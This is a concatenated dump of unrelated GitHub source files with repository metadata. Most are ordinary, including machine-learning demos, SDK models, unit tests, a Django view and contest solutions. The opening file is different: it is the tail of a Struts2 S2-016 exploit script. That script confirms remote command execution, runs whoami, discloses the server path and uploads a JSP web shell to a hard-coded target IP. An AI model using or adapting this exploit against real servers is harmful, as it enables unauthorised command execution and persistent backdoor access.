            if i != '\n' and i != '\x00':
                temp = temp + i
        return temp
    def run(self):
        """Entry point: normalize the URL, send the echo probe, and on a
        hit run whoami, path disclosure, and the JSP shell upload."""
        if not self.url.startswith("http") and not self.url.startswith("https"):
            self.url = "http://" + self.url
        if '.action' not in self.url:
            self.url = self.url + '/index.action'
        check_req = self.get_pagecode(self.url + self.check_payload)
        check_str = self.filter(list(check_req.text))
        try:
            if self.capta in check_str:
                # Marker reflected -> command execution confirmed.
                cmd_req = self.get_pagecode(self.url + self.cmd_payload)
                cmd_str = self.filter(list(cmd_req.text))
                print('存在S2-016漏洞,执行whoami命令成功,执行结果为:', cmd_str)
                path_req = self.get_pagecode(self.url + self.path_payload)
                if path_req.status_code == 200:
                    print('存在S2-016漏洞,获取网站文件路径成功,结果为:', path_req.text)
                    self.upload_jspshell(self.url, "".join(path_req.text.split()))
                    return True
                else:
                    print('不存在S2-016漏洞!')
                    return False
        except Exception as e:
            print(e)
            return False
        finally:
            pass
if __name__ == "__main__":
s2_016 = S2_016_BaseVerify('http://192.168.30.242:8080')
s2_016.run()
| [
"taomujian@protonmail.com"
] | taomujian@protonmail.com |
6b2320e8c2c47715ea5c98b27735c8f33d211d9e | 369e260e100db9ab5cc8b1711e99ef5e49aec173 | /ml/m04_xor4_keras.py | 87fe064f010eff90ddc713569ba5716aa45af154 | [] | no_license | HWALIMLEE/study | 7aa4c22cb9d7f7838634d984df96eed75f7aefea | 8336adc8999126258fe328d6b985a48e32667852 | refs/heads/master | 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,983 | py | from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from keras.layers import Dense
from keras. models import Sequential
import numpy as np
# classic ML can work on the raw lists directly,
# but for deep learning convert to np.array:
# deep learning is a sum of weighted products,
# so matrix multiplication / matrix ops must work well;
# a list only appends --> no element-wise arithmetic happens on it.
# classic ML is not weight arithmetic, so plain lists are fine there.
# labelencoder
# 1. data (XOR truth table)
x_data=[[0,0],[1,0],[0,1],[1,1]]
y_data=[0,1,1,0]
x_data=np.array(x_data)
print(x_data)
y_data=np.array(y_data)
print("x_data.shape",x_data.shape) #(4,2)
print("y_data.shape:",y_data.shape) #(4,)
# 2. model
# model=LinearSVC()
# model=SVC()
# lin = LinearSVC()
# sv = SVC()
# kn = KNeighborsClassifier(n_neighbors=1)
model=Sequential()
# the smaller n_neighbors, the tighter/denser the fit;
# with little data it is better to keep n_neighbors small
# (connect each instance to just one neighbor)
model.add(Dense(10,input_dim=2,activation='relu')) # input dim and layer width (not deep learning by itself)
model.add(Dense(30,activation='relu'))
model.add(Dense(20,activation='relu'))
model.add(Dense(10,activation='relu'))
model.add(Dense(1,activation='sigmoid')) # sigmoid only on the last layer
#output dimension=1
# 3. run
model.compile(optimizer='adam',metrics=['acc'],loss='binary_crossentropy') # metrics only reports; it does not drive training
model.fit(x_data,y_data,epochs=100,batch_size=1)
loss,acc=model.evaluate(x_data,y_data)
# accuracy can never reach 1 with a purely linear model (XOR is not linearly separable)
# 4. evaluate / predict
x_test = [[0,0],[1,0],[0,1],[1,1]]
x_test=np.array(x_test)
y_predict = model.predict(x_test)
# acc=accuracy_score([0,1,1,0],y_predict)
# a plain score is the same thing as evaluate
# (use score instead of evaluate)
# acc2=accuracy_score([0,1,1,0],y_predict)
print(x_test,"의 예측 결과:",y_predict)
print("acc=",acc) | [
"hwalim9612@gmail.com"
] | hwalim9612@gmail.com |
c3e30f6134e4652db4fcb9a756938a84de9592d2 | 3a85089c2498ff04d1b9bce17a4b8bf6cf2380c9 | /TrackPropagation/SteppingHelixPropagator/python/__init__.py | e9c699776f8f1dbd5ebfdd70d185bf5b183ab392 | [] | no_license | sextonkennedy/cmssw-ib | c2e85b5ffa1269505597025e55db4ffee896a6c3 | e04f4c26752e0775bd3cffd3a936b288ee7b0268 | HEAD | 2016-09-01T20:09:33.163593 | 2013-04-26T12:05:17 | 2013-04-29T16:40:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | #Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/TrackPropagation/SteppingHelixPropagator/',1)[0])+'/cfipython/slc6_amd64_gcc480/TrackPropagation/SteppingHelixPropagator')
| [
"giulio.eulisse@cern.ch"
] | giulio.eulisse@cern.ch |
ff0a7531475d07eb5161d4785ee3ed33b3de3b33 | 165e706d485e90f4e4f63cfb9f2c35acda14cfc0 | /uq_benchmark_2019/imagenet/data_lib_test.py | b3ae4f7ae9236b62494d913b373efd1af733d1ab | [
"Apache-2.0"
] | permissive | Tarkiyah/googleResearch | 65581f3bbbe2ffe248c9e613c0ea7eac336d5372 | dea327aa9e7ef7f7bca5a6c225dbdca1077a06e9 | refs/heads/master | 2022-12-07T12:04:44.153221 | 2019-11-21T16:03:48 | 2019-11-21T16:18:28 | 223,229,888 | 11 | 2 | Apache-2.0 | 2022-11-21T21:39:10 | 2019-11-21T17:38:31 | Jupyter Notebook | UTF-8 | Python | false | false | 4,751 | py | # coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for imagenet.data_lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import tensorflow.compat.v2 as tf
from uq_benchmark_2019 import image_data_utils
from uq_benchmark_2019.imagenet import data_lib
flags.DEFINE_bool('fake_data', True, 'Bypass tests that rely on real data and '
'use dummy random data for the remaining tests.')
tf.enable_v2_behavior()
BATCH_SIZE = 8
BATCHED_IMAGES_SHAPE = (BATCH_SIZE,) + data_lib.IMAGENET_SHAPE
class DataLibTest(parameterized.TestCase, tf.test.TestCase):
  """Tests for data_lib.build_dataset across splits and corruption configs."""

  def _assert_valid_image_batch(self, dataset):
    """Checks one batch: expected shape, values in [0, 1], not all near-zero.

    The last assertion guards against a silently empty (all-black) batch,
    which would otherwise satisfy the range check.
    """
    image = next(iter(dataset))[0].numpy()
    self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
    self.assertAllInRange(image, 0., 1.)
    self.assertTrue((image > 1./255).any())

  @parameterized.parameters(['train', 'test', 'valid'])
  def test_fake_data(self, split):
    # config is ignored for fake data
    config = image_data_utils.DataConfig(split)
    dataset = data_lib.build_dataset(config, BATCH_SIZE, fake_data=True)
    self._assert_valid_image_batch(dataset)

  @parameterized.parameters(['train', 'test', 'valid'])
  def test_uncorrupted_data(self, split):
    config = image_data_utils.DataConfig(split)
    if not flags.FLAGS.fake_data:
      dataset = data_lib.build_dataset(config, BATCH_SIZE)
      self._assert_valid_image_batch(dataset)

  @parameterized.parameters(['train', 'test', 'valid'])
  def test_roll_pixels(self, split):
    config = image_data_utils.DataConfig(split, roll_pixels=5)
    if not flags.FLAGS.fake_data:
      dataset = data_lib.build_dataset(config, BATCH_SIZE)
      self._assert_valid_image_batch(dataset)

  @parameterized.parameters(['train', 'test', 'valid'])
  def test_static_imagenet_c(self, split):
    if not flags.FLAGS.fake_data:
      config = image_data_utils.DataConfig(
          split, corruption_static=True, corruption_level=3,
          corruption_type='pixelate')
      if split in ['train', 'valid']:
        # Static (pre-generated) ImageNet-C data only exists for the test
        # split, so other splits must be rejected.
        with self.assertRaises(ValueError):
          data_lib.build_dataset(config, BATCH_SIZE)
      else:
        dataset = data_lib.build_dataset(config, BATCH_SIZE)
        self._assert_valid_image_batch(dataset)

  @parameterized.parameters(['train', 'test', 'valid'])
  def test_array_imagenet_c(self, split):
    if not flags.FLAGS.fake_data:
      config = image_data_utils.DataConfig(
          split, corruption_level=4, corruption_type='glass_blur')
      dataset = data_lib.build_dataset(config, BATCH_SIZE)
      self._assert_valid_image_batch(dataset)

  @parameterized.parameters(['train', 'test', 'valid'])
  def test_value_imagenet_c(self, split):
    if not flags.FLAGS.fake_data:
      config = image_data_utils.DataConfig(
          split, corruption_value=.25, corruption_type='brightness')
      dataset = data_lib.build_dataset(config, BATCH_SIZE)
      self._assert_valid_image_batch(dataset)

  def test_alt_dataset(self):
    if not flags.FLAGS.fake_data:
      config = image_data_utils.DataConfig('test', alt_dataset_name='celeb_a')
      dataset = data_lib.build_dataset(config, BATCH_SIZE)
      self._assert_valid_image_batch(dataset)
if __name__ == '__main__':
absltest.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
3817408a598bef35193652dc85f27df0d7823622 | 8023bdc11776a09b0fff0e9b581bbd42b8013afa | /h2tau/PlotEM.py | 7e972f1232900d42d001e07c09b25d5c20d09127 | [] | no_license | uwcms/UWHiggs | 0785d431b12df07e872a00b36279227781a6c1de | 53c1bd2671dea2553f8bbc5dcdf56a823ccf36f6 | refs/heads/master | 2021-01-16T19:32:45.480056 | 2014-02-06T02:11:54 | 2014-02-06T02:11:54 | 8,310,494 | 0 | 2 | null | 2014-10-10T13:03:07 | 2013-02-20T10:02:08 | C++ | UTF-8 | Python | false | false | 1,396 | py | '''
Make inclusive e-mu (Z + ttbar) control plots
'''
import os
import glob
from FinalStateAnalysis.PlotTools.Plotter import Plotter
# Job identifier selects which analysis results/inputs directory tree to read.
jobid = os.environ['jobid']
output_dir = os.path.join('results', jobid, 'plots', 'em')
# Glob patterns for the MC samples and the MuEG data stream to include.
samples = [
    'Zjets_M50',
    'WZ*',
    'WW*',
    'ZZ*',
    'TT*',
    'WplusJets*',
    "data_MuEG*",
]
files = []
lumifiles = []
# Collect the analyzed ROOT files and matching luminosity sums per sample.
for x in samples:
    files.extend(glob.glob('results/%s/AnalyzeEM/%s.root' % (jobid, x)))
    lumifiles.extend(glob.glob('inputs/%s/%s.lumicalc.sum' % (jobid, x)))
plotter = Plotter(files, lumifiles, output_dir)
# Override ordering
plotter.mc_samples = [
    'TTplusJets_madgraph',
    'WplusJets_madgraph',
    'Zjets_M50',
    'WZJetsTo3LNu*',
    'WW*',
    'ZZJetsTo4L*',
]
# Center-of-mass energy label inferred from the job id (7 TeV vs 8 TeV).
sqrts = 7 if '7TeV' in jobid else 8
# Dilepton mass plot gets a rebin and CMS blurb; remaining plots use defaults.
plotter.plot_mc_vs_data('em', 'emMass', rebin=10, leftside=False,
                        xaxis='m_{e#mu} (GeV)')
plotter.add_cms_blurb(sqrts)
plotter.save('mass')
plotter.plot_mc_vs_data('em', 'mPt')
plotter.save('mPt')
plotter.plot_mc_vs_data('em', 'ePt')
plotter.save('ePt')
plotter.plot_mc_vs_data('em', 'mAbsEta')
plotter.save('mAbsEta')
plotter.plot_mc_vs_data('em', 'eAbsEta')
plotter.save('eAbsEta')
plotter.plot_mc_vs_data('em', 'nvtx')
plotter.save('nvtx')
plotter.plot_mc_vs_data('em', 'bjetCSVVeto')
plotter.save('bjetCSVVeto')
plotter.plot_mc_vs_data('em', 'bjetVeto')
plotter.save('bjetVeto')
| [
"ekfriis@gmail.com"
] | ekfriis@gmail.com |
152113e43cceee7807ab807267ca54fb2a1d1c19 | 5922398212b6e113f416a54d37c2765d7d119bb0 | /python/Search a 2D Matrix.py | 28456dbb8f7a1a1330809a51885131a419f64dcf | [] | no_license | CrazyCoder4Carrot/lintcode | e777f73e1fdfe3b8abc9dbfc07d26602bf614151 | 33dcd7f0e2d9bee58840a3370837cb2db82de1eb | refs/heads/master | 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | class Solution:
"""
@param matrix, a list of lists of integers
@param target, an integer
@return a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
for row in matrix:
if target in row:
return True
return False | [
"liuzhenbang1988@gmail.com"
] | liuzhenbang1988@gmail.com |
2bb6b170f6c1fa3e3e754886a338b80c7b74302c | 59a688e68421794af64bfe69a74f64b2c80cd79d | /math_riddles/floor_problem_challenge.py | ddbc10db108624c04c65eb5008db0f6129fe587a | [] | no_license | hearues-zueke-github/python_programs | f23469b306e057512aadecad0ca0a02705667a15 | d24f04ca143aa93f172210a4b9dfdd9bf1b79a15 | refs/heads/master | 2023-07-26T00:36:56.512635 | 2023-07-17T12:35:16 | 2023-07-17T12:35:16 | 117,093,746 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | #! /usr/bin/python3
from fractions import Fraction as frac
from math import floor as fl
if __name__=='__main__':
    # solve x*floor(x*floor(x*floor(x))) = n, where n = 2020 e.g.
    def f(x):
        # Nested floor expression evaluated exactly with Fractions.
        return x*fl(x*fl(x*fl(x)))
    n = 2020
    # Search over rationals numer/denom, alternately growing numerator and
    # denominator to bracket the target value n.
    numer = 1
    denom = 1
    # a = frac(1, 1)
    is_increment_numerator = True
    while True:
        a = frac(numer, denom)
        y = f(a)
        fl_y = fl(y)
        print("numer: {}, denom: {}, float(y): {}".format(numer, denom, float(y)))
        # Stop only when f(a) is an exact integer equal to n.
        if (y.numerator % y.denominator == 0) and (fl_y == n):
            break
        if is_increment_numerator:
            # Grow the candidate until it overshoots n, then switch modes.
            numer += 1
            a_new = frac(numer, denom)
            # fl_a_new = fl(f(a_new))
            if f(a_new)>n:
                # if fl_a_new>n:
                is_increment_numerator = False
            # NOTE(review): `a` is overwritten at the top of the loop, so this
            # assignment has no observable effect.
            a = a_new
        else:
            # Shrink the candidate by growing the denominator.
            denom += 1
            # NOTE(review): denom was just incremented, so this probes
            # frac(numer, denom+1) — possibly frac(numer, denom) was intended;
            # verify against the intended search strategy.
            a_new = frac(numer, denom+1)
            # fl_a_new = fl(f(a_new))
            if f(a_new)<n:
                # if fl_a_new<n:
                is_increment_numerator = True
            a = a_new
| [
"hziko314@gmail.com"
] | hziko314@gmail.com |
5cd36692ca51be88c22fee7de2ef5d3cd9b98621 | 551b75f52d28c0b5c8944d808a361470e2602654 | /huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/node_nic_spec.py | 964ad72f81427f81c112f83c177d65a55488e0f1 | [
"Apache-2.0"
] | permissive | wuchen-huawei/huaweicloud-sdk-python-v3 | 9d6597ce8ab666a9a297b3d936aeb85c55cf5877 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | refs/heads/master | 2023-05-08T21:32:31.920300 | 2021-05-26T08:54:18 | 2021-05-26T08:54:18 | 370,898,764 | 0 | 0 | NOASSERTION | 2021-05-26T03:50:07 | 2021-05-26T03:50:07 | null | UTF-8 | Python | false | false | 3,422 | py | # coding: utf-8
import pprint
import re
import six
class NodeNicSpec:
    """Node NIC specification: a primary NIC plus optional extension NICs.

    Attributes:
        openapi_types (dict): maps attribute name to its declared type.
        attribute_map (dict): maps attribute name to its JSON key.
    """

    sensitive_list = []

    openapi_types = {
        'primary_nic': 'NicSpec',
        'ext_nics': 'list[NicSpec]'
    }

    attribute_map = {
        'primary_nic': 'primaryNic',
        'ext_nics': 'extNics'
    }

    def __init__(self, primary_nic=None, ext_nics=None):
        """NodeNicSpec - a model defined in huaweicloud sdk"""
        self._primary_nic = None
        self._ext_nics = None
        self.discriminator = None
        # Only assign through the property setters when a value was provided,
        # leaving unset fields as None.
        if primary_nic is not None:
            self.primary_nic = primary_nic
        if ext_nics is not None:
            self.ext_nics = ext_nics

    @property
    def primary_nic(self):
        """Gets the primary_nic of this NodeNicSpec.

        :return: The primary_nic of this NodeNicSpec.
        :rtype: NicSpec
        """
        return self._primary_nic

    @primary_nic.setter
    def primary_nic(self, primary_nic):
        """Sets the primary_nic of this NodeNicSpec.

        :param primary_nic: The primary_nic of this NodeNicSpec.
        :type: NicSpec
        """
        self._primary_nic = primary_nic

    @property
    def ext_nics(self):
        """Gets the ext_nics of this NodeNicSpec.

        扩展网卡 (extension NICs)

        :return: The ext_nics of this NodeNicSpec.
        :rtype: list[NicSpec]
        """
        return self._ext_nics

    @ext_nics.setter
    def ext_nics(self, ext_nics):
        """Sets the ext_nics of this NodeNicSpec.

        扩展网卡 (extension NICs)

        :param ext_nics: The ext_nics of this NodeNicSpec.
        :type: list[NicSpec]
        """
        self._ext_nics = ext_nics

    def to_dict(self):
        """Returns the model properties as a dict"""
        def _convert(item):
            # Nested models expose to_dict(); plain values pass through.
            return item.to_dict() if hasattr(item, "to_dict") else item

        result = {}
        for attr in self.openapi_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [_convert(element) for element in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {key: _convert(val) for key, val in value.items()}
            else:
                # Scalar values: mask fields declared sensitive.
                result[attr] = "****" if attr in self.sensitive_list else value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if isinstance(other, NodeNicSpec):
            return self.__dict__ == other.__dict__
        return False

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
be980be27bb8f62cb951489a5a2b039bb1c37cb9 | c8cee25ecb60ca3e6ce5e24c37db57f82f9858f6 | /ConversionPDFaExcelconPythonPandas/pdfaexcelconpandas.py | f2ae448d09dcaa10e19f8e115b76df442765633a | [] | no_license | mecomontes/Python | a0b4a0b69ae33ad3623e908731710563392d1615 | daba4247cca90c43a979e3e3f292cd7b8951b3d0 | refs/heads/master | 2023-05-30T05:24:41.999196 | 2020-03-23T02:30:09 | 2020-03-23T02:30:09 | 249,317,310 | 1 | 0 | null | 2023-05-22T22:42:36 | 2020-03-23T02:29:38 | Python | UTF-8 | Python | false | false | 339 | py | from tabula import read_pdf
# Extract the table from the PDF; guess=False disables tabula's automatic
# table-area detection, and the first two rows are skipped with no header row.
df = read_pdf('../Pdfs/Libro1.pdf',
               guess=False,
               pandas_options={'skiprows':[0,1],'header':None}
               )
# Notebook residue: the result of head() is discarded when run as a script.
df.head()
# Spanish column names: month, day, year, and daily weather measurements.
headers = ['Mes','Dia','Año','PptSalpo','TempMax','TempMin','Ppt','Wind','Hum','Solar']
df.columns = headers
df.head()
# Write the relabeled table out as an Excel workbook.
df.to_excel('../Xls/Libro1.xlsx')
| [
"1574@holbertonschool.com"
] | 1574@holbertonschool.com |
155ca9d2c3c3e780023de74a3f730658e9eb5a3e | eb36f5ee5b97aae79e7da87602fd4da293a52892 | /tests/op/test_op_setitem.py | af18cd175b6825ed13b183153485f125ea4ab78b | [
"MIT"
] | permissive | turiya/toy-auto-diff | e3f3adc803d0f2c34d9211a62bc646fa491372e2 | bd54cd4d34b482498927449608d47039368dcd8a | refs/heads/master | 2020-06-20T03:25:14.975249 | 2019-03-02T04:58:30 | 2019-03-02T04:58:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | import numpy as np
import auto_diff as ad
from .util import NumGradCheck
class TestOpSetItem(NumGradCheck):
    """Tests for ad.setitem: forward assignment works, backward is unsupported."""

    def test_forward(self):
        """setitem writes the constant at (1, 2) without changing the shape."""
        values = np.random.random((3, 4))
        var = ad.variable(values)
        updated = ad.setitem(var, (1, 2), ad.constant(5.0))
        written = updated.forward()[1, 2]
        self.assertEqual(var.shape, updated.shape)
        self.assertTrue(np.allclose(5.0, written), (5.0, written))

    def test_backward(self):
        """The gradient of setitem is not implemented and must raise."""
        with self.assertRaises(NotImplementedError):
            var = ad.variable(np.random.random((3, 4)))
            updated = ad.setitem(var, (1, 2), ad.constant(5.0))
            self.numeric_gradient_check(updated, {}, [var])
| [
"CyberZHG@gmail.com"
] | CyberZHG@gmail.com |
fd521e1e8e0199069605ae7e221b0c9872a0793f | de56ee2369d36c93ad802f0359f3274b9a3f0a25 | /photos/views.py | 24f001752b2e3f0c656bd3f2ee705b695289f932 | [] | no_license | Anubhav722/asynchronous-celery-tasks | bdfd485b6c6b2777a4712ad64ebabf347e717654 | a21f055e8e524db662d21f60dac2f8daab075f63 | refs/heads/master | 2021-01-23T00:45:41.631402 | 2017-05-31T10:47:44 | 2017-05-31T10:47:44 | 92,840,568 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.shortcuts import render
from django.views.generic.list import ListView
from photos.models import Photo
from feedback.forms import FeedbackForm
# Create your views here.
class PhotoView(ListView):
    """Paginated list of Photo objects with an empty feedback form attached."""

    model = Photo
    template_name = 'photos/photo_list.html'
    paginate_by = 24

    def get_context_data(self, **kwargs):
        """Extend the default list context with a blank FeedbackForm."""
        ctx = super(PhotoView, self).get_context_data(**kwargs)
        ctx['form'] = FeedbackForm()
        return ctx
"anubhavs286@gmail.com"
] | anubhavs286@gmail.com |
5864bdacd428ec82508f2d42b00accffcb92af2e | 8410bb5a2e8849bb3a554b95ddc713d88f3440c4 | /aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/DS(1).py | 7d457b2281e3fa4a816885299c994457c23f6ba4 | [
"MIT"
] | permissive | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | ae99b6c1efb30e8fab5b76e3d8c821823a4cd852 | b9838b4e038b42ad1813a296379cbbc40cab6286 | refs/heads/master | 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 | MIT | 2021-06-02T00:57:45 | 2019-11-06T09:54:09 | Python | UTF-8 | Python | false | false | 950 | py | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.dsbase
class DS(dns.rdtypes.dsbase.DSBase):
    """DS (Delegation Signer) record.

    All parsing, formatting, and wire handling is inherited from DSBase;
    this subclass only binds the rdata type name.
    """
| [
"sonalis@packtpub.com"
] | sonalis@packtpub.com |
beb326dc1932346c4a7e3a63941053a44da0e48a | d2eb7bd335175edd844a3e6c1c633ee0dc2dbb25 | /contests_atcoder/arc110/arc110_a.py | 72fdc5c78f226f000d840020f629b98b4bbf4129 | [
"BSD-2-Clause"
] | permissive | stdiorion/competitive-programming | 5020a12b85f1e691ceb0cacd021606a9dc58b72c | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | refs/heads/main | 2023-03-27T01:13:42.691586 | 2021-03-08T08:05:53 | 2021-03-08T08:05:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 641 | py | from itertools import accumulate,chain,combinations,groupby,permutations,product
from collections import deque,Counter
from bisect import bisect_left,bisect_right
from math import gcd,sqrt,sin,cos,tan,degrees,radians
from fractions import Fraction
from decimal import Decimal
from functools import reduce
import sys
input = lambda: sys.stdin.readline().rstrip()
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
MOD=10**9+7
INF=float('inf')
def lcm_base(x, y):
    """Least common multiple of two integers via lcm(x, y) = x*y // gcd(x, y)."""
    product = x * y
    return product // gcd(x, y)
def lcm(*numbers):
    """Least common multiple of all arguments (1 when called with none)."""
    result = 1
    for value in numbers:
        result = lcm_base(result, value)
    return result
n = int(input())
# The leading run of unary '+'/'-' operators contains 14 minus signs (an even
# count), so the whole prefix reduces to +1: this prints lcm(2..n) + 1, which
# leaves remainder 1 when divided by every k in 2..n.
print(---+-+--+---+----+-1 + lcm(*list(range(2, n + 1))))
"itkn1900@gmail.com"
] | itkn1900@gmail.com |
b03d70f00d9f929eb2e0d6a9404207541522dfe7 | 52cb25dca22292fce4d3907cc370098d7a57fcc2 | /BAEKJOON/수학1/1748_수 이어 쓰기1.py | 167d4e44ab35c67945bc83a25c6beb23aeb37edd | [] | no_license | shjang1013/Algorithm | c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a | 33f2caa6339afc6fc53ea872691145effbce0309 | refs/heads/master | 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | # 새로운 수의 자릿수를 출력하기
# Count the total digits written when the numbers 1..N are concatenated.
N = input()
n = len(N)  # number of digits of N
count = 0
# Complete digit-length groups below 10**(n-1): there are 9*10**i numbers
# with exactly (i+1) digits, each contributing (i+1) digits.
for i in range(n-1):
    count += 9*(10**i)*(i+1)
# Partial group: the numbers from 10**(n-1) up to N, each n digits long.
count += (int(N)-10**(n-1)+1)*n
print(count)
| [
"shjang113@gmail.com"
] | shjang113@gmail.com |
c73ec9c62a678fa9a4f062d57defffbd993e56da | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/21/usersdata/75/8322/submittedfiles/exercicio24.py | ff41fdd82bbba07417472c07bcf3f1e9ba01e933 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
i=1
a= int(input('Digite o valor do primeiro número:'))
b= int(input('Digite o valor do segundo número:'))
while i<=(a and b):
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
e2a45d6a3e24edb3074e7e521b9f78b91a415f56 | 6e6f97f416c06aada38c3a9db23eed7517bfaa6d | /comment/tests/test_models/test_followers.py | 0a11fadb19eb1f3dec4e17ab1490bebd3bb2f26c | [
"MIT"
] | permissive | ZendaInnocent/sogea | 1735ad047539c09a5c81e196a7a1963022452098 | 54cf257856cae451ad87e2396b8e44a34c0c6daf | refs/heads/main | 2023-08-23T07:18:45.741826 | 2021-10-28T13:19:06 | 2021-10-28T13:19:06 | 365,683,816 | 0 | 0 | MIT | 2021-05-09T06:29:57 | 2021-05-09T06:29:57 | null | UTF-8 | Python | false | false | 7,294 | py | from unittest.mock import patch
from django.contrib.contenttypes.models import ContentType
from comment.conf import settings
from comment.models import Follower
from comment.tests.base import BaseCommentTest
class FollowerModelTest(BaseCommentTest):
    """Model-level tests for Follower: creation and string representations."""
    @classmethod
    def setUpTestData(cls):
        # One followed comment and one Follower entry shared by all tests.
        super().setUpTestData()
        cls.comment_test_follow = cls.create_comment(cls.content_object_1)
        cls.email = 't@t.com'
        cls.follower = Follower.objects.create(
            email=cls.email,
            username='test',
            content_object=cls.comment_test_follow
        )
    def test_can_create_entry(self):
        self.assertIsNotNone(self.follower)
    def test_string_value(self):
        # str() and repr() share the same "<comment> followed by <email>" form.
        self.assertEqual(str(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
        self.assertEqual(repr(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
class FollowerManagerTest(BaseCommentTest):
    """Tests for the Follower manager: follow/unfollow/toggle and queries."""
    @classmethod
    def setUpTestData(cls):
        # One comment with a registered follower, plus a comment authored by a
        # user without an email (used by the follow_parent_thread tests).
        super().setUpTestData()
        cls.manager = Follower.objects
        cls.follower_email = 'f1@t.com'
        cls.unfollower_email = 'uf@t.com'
        cls.comment_test_follow = cls.create_comment(cls.content_object_1)
        cls.comment_without_email = cls.create_comment(cls.content_object_1, user=cls.user_without_email)
        cls.follower = cls.manager.create(
            email=cls.follower_email,
            username='test',
            content_object=cls.comment_test_follow
        )
    def test_is_following(self):
        self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
        self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
    def test_follow_return_none_on_missing_email(self):
        self.assertIsNone(self.manager.follow('', 'username', self.comment_test_follow))
    def test_follow_return_none_if_email_is_already_follow(self):
        self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
        self.assertIsNone(self.manager.follow(self.follower_email, 'username', self.comment_test_follow))
    def test_follow_create_follower_instance(self):
        initial_count = self.manager.count()
        follower = self.manager.follow(self.unfollower_email, 'username', self.comment_test_follow)
        self.assertIsInstance(follower, self.manager.model)
        self.assertEqual(self.manager.count(), initial_count + 1)
    def test_unfollow_delete_follower_instance(self):
        initial_count = self.manager.count()
        self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
        self.manager.unfollow(self.follower_email, self.comment_test_follow)
        self.assertEqual(self.manager.count(), initial_count - 1)
    def test_toggle_follow_return_false_on_missing_email(self):
        email = None
        result = self.manager.toggle_follow(email=email, username='test', model_object=self.comment_test_follow)
        self.assertFalse(result)
    def test_toggle_follow_for_follower(self):
        """set the follower to unfollower and return false"""
